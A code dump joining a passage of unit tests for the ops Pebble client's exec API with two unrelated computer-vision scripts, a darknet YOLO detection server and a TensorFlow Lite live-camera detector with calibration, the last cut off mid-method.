stdio.receives.append('{"command":"end"}')
stderr.receives.append('{"command":"end"}')
with self.assertLogs('ops.pebble', level='WARNING') as cm:
process = self.client.exec(['python3', '--version'])
out, err = process.wait_output()
self.assertEqual(cm.output, [
"WARNING:ops.pebble:Cannot decode I/O command (invalid JSON)",
"WARNING:ops.pebble:Invalid I/O command 'foo'",
])
self.assertEqual(out, 'Python 3.8.10\n')
self.assertEqual(err, '')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['python3', '--version'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [])
def test_wait_passed_output(self):
io_ws, stderr, _ = self.add_responses('123', 0)
io_ws.receives.append(b'foo\n')
io_ws.receives.append('{"command":"end"}')
stderr.receives.append(b'some error\n')
stderr.receives.append('{"command":"end"}')
out = io.StringIO()
err = io.StringIO()
process = self.client.exec(['echo', 'foo'], stdout=out, stderr=err)
process.wait()
self.assertEqual(out.getvalue(), 'foo\n')
self.assertEqual(err.getvalue(), 'some error\n')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['echo', 'foo'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(io_ws.sends, [])
def test_wait_passed_output_combine_stderr(self):
io_ws, _, _ = self.add_responses('123', 0)
io_ws.receives.append(b'foo\n')
io_ws.receives.append(b'some error\n')
io_ws.receives.append('{"command":"end"}')
out = io.StringIO()
process = self.client.exec(['echo', 'foo'], stdout=out, combine_stderr=True)
process.wait()
self.assertEqual(out.getvalue(), 'foo\nsome error\n')
self.assertIsNone(process.stderr)
exec_data = self.build_exec_data(['echo', 'foo'], combine_stderr=True)
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, exec_data),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(io_ws.sends, [])
def test_wait_passed_output_bytes(self):
io_ws, stderr, _ = self.add_responses('123', 0)
io_ws.receives.append(b'foo\n')
io_ws.receives.append('{"command":"end"}')
stderr.receives.append(b'some error\n')
stderr.receives.append('{"command":"end"}')
out = io.BytesIO()
err = io.BytesIO()
process = self.client.exec(['echo', 'foo'], stdout=out, stderr=err, encoding=None)
process.wait()
self.assertEqual(out.getvalue(), b'foo\n')
self.assertEqual(err.getvalue(), b'some error\n')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['echo', 'foo'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(io_ws.sends, [])
def test_wait_passed_output_bad_command(self):
io_ws, stderr, _ = self.add_responses('123', 0)
io_ws.receives.append(b'foo\n')
io_ws.receives.append('not json') # bad JSON should be ignored
io_ws.receives.append('{"command":"foo"}') # unknown command should be ignored
io_ws.receives.append('{"command":"end"}')
stderr.receives.append(b'some error\n')
stderr.receives.append('{"command":"end"}')
out = io.StringIO()
err = io.StringIO()
with self.assertLogs('ops.pebble', level='WARNING') as cm:
process = self.client.exec(['echo', 'foo'], stdout=out, stderr=err)
process.wait()
self.assertEqual(cm.output, [
"WARNING:ops.pebble:Cannot decode I/O command (invalid JSON)",
"WARNING:ops.pebble:Invalid I/O command 'foo'",
])
self.assertEqual(out.getvalue(), 'foo\n')
self.assertEqual(err.getvalue(), 'some error\n')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['echo', 'foo'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(io_ws.sends, [])
@unittest.skipIf(sys.platform == 'win32', "exec() with files doesn't work on Windows")
def test_wait_file_io(self):
fin = tempfile.TemporaryFile(mode='w+', encoding='utf-8')
out = tempfile.TemporaryFile(mode='w+', encoding='utf-8')
err = tempfile.TemporaryFile(mode='w+', encoding='utf-8')
try:
fin.write('foo\n')
fin.seek(0)
io_ws, stderr, _ = self.add_responses('123', 0)
io_ws.receives.append(b'foo\n')
io_ws.receives.append('{"command":"end"}')
stderr.receives.append(b'some error\n')
stderr.receives.append('{"command":"end"}')
process = self.client.exec(['echo', 'foo'], stdin=fin, stdout=out, stderr=err)
process.wait()
out.seek(0)
self.assertEqual(out.read(), 'foo\n')
err.seek(0)
self.assertEqual(err.read(), 'some error\n')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['echo', 'foo'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(io_ws.sends, [
('BIN', b'foo\n'),
('TXT', '{"command":"end"}'),
])
finally:
fin.close()
out.close()
err.close()
def test_wait_returned_io(self):
stdio, stderr, _ = self.add_responses('123', 0)
stdio.receives.append(b'FOO BAR\n')
stdio.receives.append(b'BAZZ\n')
stdio.receives.append('{"command":"end"}')
process = self.client.exec(['awk', '{ print toupper($) }'])
process.stdin.write('Foo Bar\n')
self.assertEqual(process.stdout.read(4), 'FOO ')
process.stdin.write('bazz\n')
self.assertEqual(process.stdout.read(), 'BAR\nBAZZ\n')
process.stdin.close()
self.assertEqual(process.stdout.read(), '')
process.wait()
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['awk', '{ print toupper($) }'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [
('BIN', b'Foo Bar\nbazz\n'), # TextIOWrapper groups the writes together
('TXT', '{"command":"end"}'),
])
def test_wait_returned_io_bytes(self):
stdio, stderr, _ = self.add_responses('123', 0)
stdio.receives.append(b'FOO BAR\n')
stdio.receives.append(b'BAZZ\n')
stdio.receives.append('{"command":"end"}')
process = self.client.exec(['awk', '{ print toupper($) }'], encoding=None)
process.stdin.write(b'Foo Bar\n')
self.assertEqual(process.stdout.read(4), b'FOO ')
self.assertEqual(process.stdout.read(), b'BAR\n')
process.stdin.write(b'bazz\n')
self.assertEqual(process.stdout.read(), b'BAZZ\n')
process.stdin.close()
self.assertEqual(process.stdout.read(), b'')
process.wait()
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['awk', '{ print toupper($) }'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [
('BIN', b'Foo Bar\n'),
('BIN', b'bazz\n'),
('TXT', '{"command":"end"}'),
])
def test_connect_websocket_error(self):
class Client(MockClient):
def _connect_websocket(self, change_id, websocket_id):
raise websocket.WebSocketException('conn!')
self.client = Client()
self.add_responses('123', 0, change_err='change error!')
with self.assertRaises(pebble.ChangeError) as cm:
self.client.exec(['foo'])
self.assertEqual(str(cm.exception), 'change error!')
self.client = Client()
self.add_responses('123', 0)
with self.assertRaises(pebble.ConnectionError) as cm:
self.client.exec(['foo'])
self.assertIn(str(cm.exception), 'unexpected error connecting to websockets: conn!')
def test_websocket_send_raises(self):
stdio, stderr, _ = self.add_responses('123', 0)
raised = False
def send_binary(b):
nonlocal raised
raised = True
raise Exception('a simulated error!')
stdio.send_binary = send_binary
stdio.receives.append('{"command":"end"}')
stderr.receives.append('{"command":"end"}')
process = self.client.exec(['cat'], stdin='foo\nbar\n')
out, err = process.wait_output()
self.assertEqual(out, '')
self.assertEqual(err, '')
self.assertTrue(raised)
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['cat'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [])
# You'd normally use pytest.mark.filterwarnings as a decorator, but
# PytestUnhandledThreadExceptionWarning isn't present on older Python versions.
if hasattr(pytest, 'PytestUnhandledThreadExceptionWarning'):
test_websocket_send_raises = pytest.mark.filterwarnings(
'ignore::pytest.PytestUnhandledThreadExceptionWarning')(test_websocket_send_raises)
def test_websocket_recv_raises(self):
stdio, stderr, _ = self.add_responses('123', 0)
raised = False
def recv():
nonlocal raised
raised = True
raise Exception('a simulated error!')
stdio.recv = recv
stderr.receives.append('{"command":"end"}')
process = self.client.exec(['cat'], stdin='foo\nbar\n')
out, err = process.wait_output()
self.assertEqual(out, '')
self.assertEqual(err, '')
self.assertTrue(raised)
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['cat'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [
('BIN', b'foo\nbar\n'),
('TXT', '{"command":"end"}'),
])
if hasattr(pytest, 'PytestUnhandledThreadExceptionWarning'):
test_websocket_recv_raises = pytest.mark.filterwarnings(
'ignore::pytest.PytestUnhandledThreadExceptionWarning')(test_websocket_recv_raises)
# Set the RUN_REAL_PEBBLE_TESTS environment variable to run these tests
# against a real Pebble server. For example, in one terminal, run Pebble:
#
# $ PEBBLE=~/pebble pebble run
# 2021-09-20T04:10:34.934Z [pebble] Started daemon
#
# In another terminal, run the tests:
#
# $ source .tox/unit/bin/activate
# $ RUN_REAL_PEBBLE_TESTS=1 PEBBLE=~/pebble pytest test/test_pebble.py -v -k RealPebble
# $ deactivate
#
@unittest.skipUnless(os.getenv('RUN_REAL_PEBBLE_TESTS'), 'RUN_REAL_PEBBLE_TESTS not set')
class TestRealPebble(unittest.TestCase):
def setUp(self):
socket_path = os.getenv('PEBBLE_SOCKET')
if not socket_path and os.getenv('PEBBLE'):
socket_path = os.path.join(os.getenv('PEBBLE'), '.pebble.socket')
assert socket_path, 'PEBBLE or PEBBLE_SOCKET must be set if RUN_REAL_PEBBLE_TESTS set'
self.client = pebble.Client(socket_path=socket_path)
def test_exec_wait(self):
process = self.client.exec(['true'])
process.wait()
with self.assertRaises(pebble.ExecError) as cm:
process = self.client.exec(['/bin/sh', '-c', 'exit 42'])
process.wait()
self.assertEqual(cm.exception.exit_code, 42)
def test_exec_wait_output(self):
process = self.client.exec(['/bin/sh', '-c', 'echo OUT; echo ERR >&2'])
out, err = process.wait_output()
self.assertEqual(out, 'OUT\n')
self.assertEqual(err, 'ERR\n')
process = self.client.exec(['/bin/sh', '-c', 'echo OUT; echo ERR >&2'], encoding=None)
out, err = process.wait_output()
self.assertEqual(out, b'OUT\n')
self.assertEqual(err, b'ERR\n')
with self.assertRaises(pebble.ExecError) as cm:
process = self.client.exec(['/bin/sh', '-c', 'echo OUT; echo ERR >&2; exit 42'])
process.wait_output()
self.assertEqual(cm.exception.exit_code, 42)
self.assertEqual(cm.exception.stdout, 'OUT\n')
self.assertEqual(cm.exception.stderr, 'ERR\n')
def test_exec_send_stdin(self):
process = self.client.exec(['awk', '{ print toupper($0) }'], stdin='foo\nBar\n')
out, err = process.wait_output()
self.assertEqual(out, 'FOO\nBAR\n')
self.assertEqual(err, '')
process = self.client.exec(['awk', '{ print toupper($0) }'], stdin=b'foo\nBar\n',
encoding=None)
out, err = process.wait_output()
self.assertEqual(out, b'FOO\nBAR\n')
self.assertEqual(err, b'')
def test_exec_timeout(self):
process = self.client.exec(['sleep', '0.2'], timeout=0.1)
with self.assertRaises(pebble.ChangeError) as cm:
process.wait()
self.assertIn('timed out', cm.exception.err)
def test_exec_working_dir(self):
with tempfile.TemporaryDirectory() as temp_dir:
process = self.client.exec(['pwd'], working_dir=temp_dir)
out, err = process.wait_output()
self.assertEqual(out, temp_dir + '\n')
self.assertEqual(err, '')
def test_exec_environment(self):
process = self.client.exec(['/bin/sh', '-c', 'echo $ONE.$TWO.$THREE'],
environment={'ONE': '1', 'TWO': '2'})
out, err = process.wait_output()
self.assertEqual(out, '1.2.\n')
self.assertEqual(err, '')
def test_exec_streaming(self):
process = self.client.exec(['cat'])
def stdin_thread():
try:
for line in ['one\n', '2\n', 'THREE\n']:
process.stdin.write(line)
process.stdin.flush()
time.sleep(0.1)
finally:
process.stdin.close()
threading.Thread(target=stdin_thread).start()
reads = []
for line in process.stdout:
reads.append(line)
process.wait()
self.assertEqual(reads, ['one\n', '2\n', 'THREE\n'])
def test_exec_streaming_bytes(self):
process = self.client.exec(['cat'], encoding=None)
def stdin_thread():
try:
for line in [b'one\n', b'2\n', b'THREE\n']:
process.stdin.write(line)
process.stdin.flush()
time.sleep(0.1)
finally:
process.stdin.close()
threading.Thread(target=stdin_thread).start()
reads = []
for line in process.stdout:
reads.append(line)
process.wait()
self.assertEqual(reads, [b'one\n', b'2\n', b'THREE\n'])
|
server.py
|
#!python3
'''
##############################
### Receive Video stream #####
### from Android client #######
### Use yolo to do detect ####
## (return a message to the mobile device) ##
##############################
'''
from ctypes import *
import math
import random
import os
import socket
import time
import cv2
import numpy as np
from PIL import Image
import sys
import pickle
import struct
import timeit
import time
import threading
import ctypes
# generate different colors for different classes
COLORS = np.random.uniform(0, 255, size=(80,3))
def sample(probs):
s = sum(probs)
probs = [a/s for a in probs]
r = random.uniform(0, 1)
for i in range(len(probs)):
r = r - probs[i]
if r <= 0:
return i
return len(probs)-1
def c_array(ctype, values):
arr = (ctype*len(values))()
arr[:] = values
return arr
class BOX(Structure):
_fields_ = [("x", c_float),
("y", c_float),
("w", c_float),
("h", c_float)]
class DETECTION(Structure):
_fields_ = [("bbox", BOX),
("classes", c_int),
("prob", POINTER(c_float)),
("mask", POINTER(c_float)),
("objectness", c_float),
("sort_class", c_int)]
class IMAGE(Structure):
_fields_ = [("w", c_int),
("h", c_int),
("c", c_int),
("data", POINTER(c_float))]
class METADATA(Structure):
_fields_ = [("classes", c_int),
("names", POINTER(c_char_p))]
lib = CDLL("/home/vYOLO/libdarknet.so", RTLD_GLOBAL)
lib.network_width.argtypes = [c_void_p]
lib.network_width.restype = c_int
lib.network_height.argtypes = [c_void_p]
lib.network_height.restype = c_int
predict = lib.network_predict
predict.argtypes = [c_void_p, POINTER(c_float)]
predict.restype = POINTER(c_float)
set_gpu = lib.cuda_set_device
set_gpu.argtypes = [c_int]
make_image = lib.make_image
make_image.argtypes = [c_int, c_int, c_int]
make_image.restype = IMAGE
get_network_boxes = lib.get_network_boxes
get_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int)]
get_network_boxes.restype = POINTER(DETECTION)
make_network_boxes = lib.make_network_boxes
make_network_boxes.argtypes = [c_void_p]
make_network_boxes.restype = POINTER(DETECTION)
free_detections = lib.free_detections
free_detections.argtypes = [POINTER(DETECTION), c_int]
free_ptrs = lib.free_ptrs
free_ptrs.argtypes = [POINTER(c_void_p), c_int]
network_predict = lib.network_predict
network_predict.argtypes = [c_void_p, POINTER(c_float)]
reset_rnn = lib.reset_rnn
reset_rnn.argtypes = [c_void_p]
load_net = lib.load_network
load_net.argtypes = [c_char_p, c_char_p, c_int]
load_net.restype = c_void_p
do_nms_obj = lib.do_nms_obj
do_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
do_nms_sort = lib.do_nms_sort
do_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
free_image = lib.free_image
free_image.argtypes = [IMAGE]
letterbox_image = lib.letterbox_image
letterbox_image.argtypes = [IMAGE, c_int, c_int]
letterbox_image.restype = IMAGE
load_meta = lib.get_metadata
lib.get_metadata.argtypes = [c_char_p]
lib.get_metadata.restype = METADATA
load_image = lib.load_image_color
load_image.argtypes = [c_char_p, c_int, c_int]
load_image.restype = IMAGE
rgbgr_image = lib.rgbgr_image
rgbgr_image.argtypes = [IMAGE]
predict_image = lib.network_predict_image
predict_image.argtypes = [c_void_p, IMAGE, c_int]
predict_image.restype = POINTER(c_float)
#def classify(net, meta, im):
# out = predict_image(net, im)
# res = []
# for i in range(meta.classes):
# res.append((meta.names[i], out[i]))
# res = sorted(res, key=lambda x: -x[1])
# return res
### modified ###
HOST=''
USER_PORT=9001
CTL_PORT=11111
BUFFER_SIZE = 256
QUATO = 100
num_points = 2
wait_time = 0.01
Latency = []
Count = 0
def threading_controller(controller):
global QUATO
global Latency
print ("entered controller threading.", controller)
while True:
recv_data = controller.recv(ctypes.sizeof(ctypes.c_double)*BUFFER_SIZE)
if len(recv_data)<=0: break
data = np.fromstring(recv_data, dtype=np.double)
#print(data)
QUATO = int(data[0])
print('GPU virtual resource is ' + str(QUATO))
Latency = []
while(len(Latency)<num_points): time.sleep(wait_time)
assert(len(Latency)>=num_points) #make sure there has data in the latency
send_data = np.mean(Latency[1:]) * np.ones(BUFFER_SIZE, dtype=np.double)
#try to send data, if error break
controller.sendall(send_data)
# if controller drop, then close and re-accept
controller.close()
def connect_controller():
ctl = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
ctl.bind((HOST, CTL_PORT))
ctl.listen(10)
print('Controller Socket now listening')
while True:
controller, ctl_addr = ctl.accept()
print("Get new controller socket" + str(ctl_addr))
# start the thread darknet
threads = threading.Thread(target=threading_controller, args=(controller,))
threads.start()
def recv_image_from_socket(client):
buffers = b''
while len(buffers)<4:
try:
buf = client.recv(4-len(buffers))
except:
return False
buffers += buf
size, = struct.unpack('!i', buffers)
#print "receiving %d bytes" % size
recv_data = b''
while len(recv_data) < size:
try:
data = client.recv(1024)
except:
return False
recv_data += data
frame_data = recv_data[:size]
#recv_data = recv_data[size:]
imgdata = np.fromstring(frame_data, dtype='uint8')
decimg = cv2.imdecode(imgdata,1)
return decimg
def detect(net, meta, image, quato, thresh=.5, hier_thresh=.5, nms=.45):
# GET C,H,W, and DATA values
img = image.transpose(2, 0, 1)
c, h, w = img.shape[0], img.shape[1], img.shape[2]
nump_data = img.ravel() / 255.0
nump_data = np.ascontiguousarray(nump_data, dtype=np.float32)
# make c_type pointer to numpy array
ptr_data = nump_data.ctypes.data_as(POINTER(c_float))
# make IMAGE data type
im = IMAGE(w=w, h=h, c=c, data=ptr_data)
num = c_int(0)
pnum = pointer(num)
predict_image(net, im, quato)
dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum)
num = pnum[0]
if (nms): do_nms_obj(dets, num, meta.classes, nms);
res = []
for j in range(num):
for i in range(meta.classes):
if dets[j].prob[i] > 0:
b = dets[j].bbox
classid = i
calssnamess = meta.names[i].decode('UTF-8')
res.append((calssnamess, dets[j].prob[i], (b.x, b.y, b.w, b.h),classid))
res = sorted(res, key=lambda x: -x[1])
#free_image(im)
free_detections(dets, num)
return res
# display the pic after detecting
def showPicResult(r,im):
for i in range(len(r)):
x1=r[i][2][0]-r[i][2][2]/2
y1=r[i][2][1]-r[i][2][3]/2
x2=r[i][2][0]+r[i][2][2]/2
y2=r[i][2][1]+r[i][2][3]/2
color = COLORS[r[i][3]]
cv2.rectangle(im,(int(x1),int(y1)),(int(x2),int(y2)),color,2)
#putText
x3 = int(x1+5)
y3 = int(y1-10)
font = cv2.FONT_HERSHEY_SIMPLEX
text = "{}: {:.4f}".format(str(r[i][0]), float(r[i][1]))
if ((x3<=im.shape[0]) and (y3>=0)):
cv2.putText(im, text, (x3,y3), font, 0.5, color, 1,cv2.CV_AA)
else:
cv2.putText(im, text, (int(x1),int(y1+6)), font, 0.5, color, 1,cv2.CV_AA)
cv2.imshow('Detection Window', im)
cv2.waitKey(0)
#cv2.destroyAllWindows()
if __name__ == "__main__":
t1 = threading.Thread(target = connect_controller)
t1.setDaemon(True)
t1.start()
# detect_net = load_net(b"./cfg/yolov3-tiny.cfg", b"yolov3-tiny.weights", 0)
# detect_net = load_net(b"./cfg/yolov3-416.cfg", b"yolov3.weights", 0)
detect_net = load_net(b"./cfg/yolov3-608.cfg", b"yolov3.weights", 0)
detect_meta = load_meta(b"cfg/coco.data")
import scipy.misc
import time
decimg = cv2.imread('data/dog.jpg')
while True:
StartTime = time.time()
result = detect(detect_net, detect_meta, decimg, QUATO, thresh=0.7)
Latency.append(time.time() - StartTime)
print("{:.3f}".format(time.time() - StartTime))
|
Detection_Models.py
|
"""Specified Models for object detection with tensorflow and distance calculation."""
__version__ = "1.0.0"
__author__ = "Tim Rosenkranz"
__email__ = "tim.rosenkranz:stud.uni-frankfurt.de"
__credits__ = "Special thanks to The Anh Vuong who came up with the original idea." \
"This code is also based off of the code from Evan Juras"
# Description:
# This program uses a TensorFlow Lite model to perform object detection on a
# video. It draws boxes and scores around the objects of interest in each frame
# from the video and calculates the distance between each of these objects.
#
# This code is based off the TensorFlow Lite image classification example at:
# https://github.com/tensorflow/tensorflow/blob/master/tensorflow/lite/examples/python/label_image.py
# The code is also based off a raspberry pi tutorial for object detection:
# https://tutorials-raspberrypi.de/raspberry-pi-objekterkennung-mittels-tensorflow-und-kamera/
#
# Import packages
import os
import cv2.cv2 as cv2
import numpy as np
import sys
import time
from threading import Thread
import dlib
import importlib.util
import glob
import typing
from Detection_Basis import Detection
# Define VideoStream class to handle streaming of video from webcam in separate processing thread
# Based on - Adrian Rosebrock, PyImageSearch: https://www.pyimagesearch.com/2015/12/28/increasing-raspberry-pi-fps-with-python-and-opencv/
class VideoStream:
"""Camera object that controls video streaming from the camera"""
def __init__(self, resolution=(640, 480), framerate=30):
# Initialize the PiCamera and the camera image stream
self.stream = cv2.VideoCapture(0)
ret = self.stream.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'))
ret = self.stream.set(3, resolution[0])
ret = self.stream.set(4, resolution[1])
self.width = self.stream.get(3)
# Read first frame from the stream
(self.grabbed, self.frame) = self.stream.read()
# Variable to control when the camera is stopped
self.paused = False
self.release_stream = False
def start(self):
# Start the thread that reads frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# Keep looping indefinitely until the thread is stopped
while True:
# If the camera is stopped, stop the thread
if self.release_stream:
# Close camera resources
self.stream.release()
return
elif not self.paused:
# Otherwise, grab the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# Return the most recent frame
return self.frame
def read_ret(self):
# Return frame and ret value
return self.frame, self.grabbed
def pause_stream(self):
# Indicate that the stream should be stopped
self.paused = True
def continue_stream(self):
# Indicate that stream should resume
self.stopped = False
self.start()
def stop_stream(self):
# Indicate that stream should be released
self.release_stream = True
class LiveDetection(Detection):
"""
Class for live object detection
"""
def __init__(self,
model_name: str = 'Sample_Model',
graph_name: str = 'detect.tflite',
labelmap_name: str = 'labelmap.txt',
min_conf_threshold: int = 0.5,
use_tpu: str = '',
distance_threshold: int = 150,
resolution: str = '1280x720',
debug: bool = False
):
"""
Live object detection and distance calculation.
:param model_name: Name of the directory for the detection model
:param graph_name: Name of the used detection model file
:param labelmap_name: Name of the used labelmap file
:param min_conf_threshold: minimum confidence value for detected objects to be acknowledged
:param use_tpu: specifier if a TPU is to be used
:param distance_threshold: minimum distance value between objects
:param resolution: desired video resolution
"""
super(LiveDetection, self).__init__(model_name, graph_name, labelmap_name, min_conf_threshold, use_tpu,
distance_threshold)
resW, resH = resolution.split('x')
self._imW, self._imH = int(resW), int(resH)
# Initialize frame rate calculation
self._frame_rate_calc = 1
self._freq = cv2.getTickFrequency()
# Initialize video stream
self._videostream = VideoStream(resolution=(self._imW, self._imH), framerate=30).start()
time.sleep(1)
def calibrate(self,
obj_width_cm: int = 0,
obj_dist_cm: int = 0,
obj_name: str = "",
sample_count: int = 10,
debug: bool = False
):
"""
Calculation for the focal width of used camera. Note that a change in the focal width after calibrating
will result in faulty distance calculations.
:param obj_width_cm: the width of the object to calibrate with
:param obj_dist_cm: the distance of the object to calibrate with
:param obj_name: the name of the object to calibrate with
:param sample_count: number of samples to take for focal width calculation (mean will be used)
:param debug: Toggle debug information
:return: True as signal for GUI
"""
color_variation = 0
foc_measures = 0
for i in range(sample_count):
# Grab frame from video stream
frame1 = self._videostream.read()
# Acquire frame and resize to expected shape [1xHxWx3]
frame = frame1.copy()
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (self._width, self._height))
input_data = np.expand_dims(frame_resized, axis=0)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if self._floating_model:
input_data = (np.float32(input_data) - self.input_mean) / self.input_std
# Perform the actual detection by running the model with the image as input
self._interpreter.set_tensor(self._input_details[0]['index'], input_data)
self._interpreter.invoke()
# Retrieve detection results
boxes = self._interpreter.get_tensor(self._output_details[0]['index'])[
0] # Bounding box coordinates of detected objects
classes = self._interpreter.get_tensor(self._output_details[1]['index'])[
0] # Class index of detected objects
scores = self._interpreter.get_tensor(self._output_details[2]['index'])[
0] # Confidence of detected objects
obj_type = []
for i in range(len(scores)):
if (scores[i] > self._min_conf_threshold) and (scores[i] <= 1.0):
# Check for the right object (ensure correct measurement when several objects are detected)
if self._labels[int(classes[i])] != obj_name:
continue
else:
obj_type.append(str(self._labels[int(classes[i])]))
# Get bounding box coordinates and draw box
# Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()
ymin = int(max(1, (boxes[i][0] * self._imH)))
xmin = int(max(1, (boxes[i][1] * self._imW)))
ymax = int(min(self._imH, (boxes[i][2] * self._imH)))
xmax = int(min(self._imW, (boxes[i][3] * self._imW)))
cv2.rectangle(frame, (xmin, ymin), (xmax, ymax),
(10, (40 + (40 * i)) % 255, (color_variation * 40) % 255), 2)
# Calculate object width in pixel
obj_width_pixels = xmax - xmin
foc_measures += (obj_width_pixels * obj_dist_cm) / obj_width_cm
# Draw label
object_name = self._labels[
int(classes[i])] # Look up object name from "labels" array using class index
label = '%s: %d%%' % (object_name, int(scores[i] * 100)) # Example: 'person: 72%'
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size
label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window
cv2.rectangle(frame, (xmin, label_ymin - labelSize[1] - 10),
(xmin + labelSize[0], label_ymin + baseLine - 10), (255, 255, 255),
cv2.FILLED) # Draw white box to put label text in
cv2.putText(frame, label, (xmin, label_ymin - 7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0),
2) # Draw label text
# Draw framerate in corner of frame
cv2.putText(frame, 'FPS: {0:.2f}'.format(self._frame_rate_calc), (15, 35), cv2.FONT_HERSHEY_SIMPLEX, 1,
(255, 255, 0), 2, cv2.LINE_AA)
# All the results have been drawn on the frame, so it's time to display it.
cv2.imshow('Object detector', frame)
self.focal_value = foc_measures / sample_count
if (debug):
print("Focal value:", self.focal_value)
return True
def calibrate_board(self,
cols: int = 0,
rows: int = 0,
debug: bool = False
):
"""Calibration via chessboard with opencv
:param cols: columns of the chessborad to be detected
:param rows: rows of the chessboard to be detected
:param debug: debug mode
:return: if calibration was successful
"""
img_counter = 0
img_name = ""
print("++ Press SPACE to take a photo of the chess board. Press ESC to start the calibration. ++")
while True:
frame, ret = self._videostream.read_ret()
if not ret:
print("failed to grab frame")
break
cv2.imshow("test", frame)
k = cv2.waitKey(1)
if k % 256 == 27:
# ESC pressed
print("Closing photo cam. Start calibration")
break
elif k % 256 == 32:
# SPACE pressed
img_name = "Calibration_stuff/calibration_frame_{}.png".format(img_counter)
cv2.imwrite(img_name, frame)
print("{} written!".format(img_name))
img_counter += 1
# self._videostream.pause_stream()
cv2.destroyAllWindows()
return self.check_board(cols, rows, frame, debug)
def check_board(self,
cols: int = 0,
rows: int = 0,
image: any = None,
debug: bool = False
):
"""Calibration via chessboards with opencv
:param cols: columns of the chessborad to be detected
:param rows: rows of the chessboard to be detected
:param image: name of the file the photo of he chessboard is saved as
:param debug: debug mode
:return: if detection was successful
"""
# Termination criteria
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 60, 0.001)
# Object points (preparation)
object_points = np.zeros((cols * rows, 3), np.float32)
object_points[:, :2] = np.mgrid[0:rows, 0:cols].T.reshape(-1, 2)
# Storage
real_points = []
img_points = []
# Read image
#img = cv2.imread(img_name)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
if debug:
cv2.imshow('img', image)
# Find chessboard corners
results = cv2.findChessboardCorners(gray, (rows, cols), None)
ret = results[0]
corners = results[1]
if debug:
print("results: ")
print(results)
# If found add object points
if ret is True:
real_points.append(object_points)
corners2 = cv2.cornerHarris(gray, corners, (11, 11), (-1, -1), criteria)
img_points.append(corners)
# Draw + display
cv2.drawChessboardCorners(image, (cols, rows), corners2, ret)
cv2.imshow('img', image)
cv2.waitKey(500)
# Calibrate camera
ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(object_points, img_points, gray.shape[::-1], None, None)
frame1 = self._videostream.read()
frame = frame1.copy()
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (self._width, self._height))
h, w = frame.shape[:2]
newcameramtx, roi = cv2.getOptimalNewCameraMatrix(mtx, dist, (w, h), 1, (w, h))
# undistort
dst = cv2.undistort(image, mtx, dist, None, newcameramtx)
# crop the image
x, y, w, h = roi
dst = dst[y:y + h, x:x + w]
cv2.imwrite('calibresult.png', dst)
return ret
def detect(self,
detect: list = [],
no_detect: list = [],
autosave: bool = False,
video_title: str = "",
debug: bool = False
):
"""
Object detection via a live camera feed and distance calculations of the objects.
"""
if (autosave):
if (debug):
print("==== AUTOSAVE ON ====")
fourcc = cv2.VideoWriter_fourcc(*'XVID')
video_out = cv2.VideoWriter(video_title + ".avi", fourcc, 20.0, (640, 480))
color_variation = 0
# for frame1 in camera.capture_continuous(rawCapture, format="bgr",use_video_port=True):
while True:
# Start timer (for calculating frame rate)
t1 = cv2.getTickCount()
# Grab frame from video stream
frame1 = self._videostream.read()
# Acquire frame and resize to expected shape [1xHxWx3]
frame = frame1.copy()
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (self._width, self._height))
input_data = np.expand_dims(frame_resized, axis=0)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if self._floating_model:
input_data = (np.float32(input_data) - self.input_mean) / self.input_std
# Perform the actual detection by running the model with the image as input
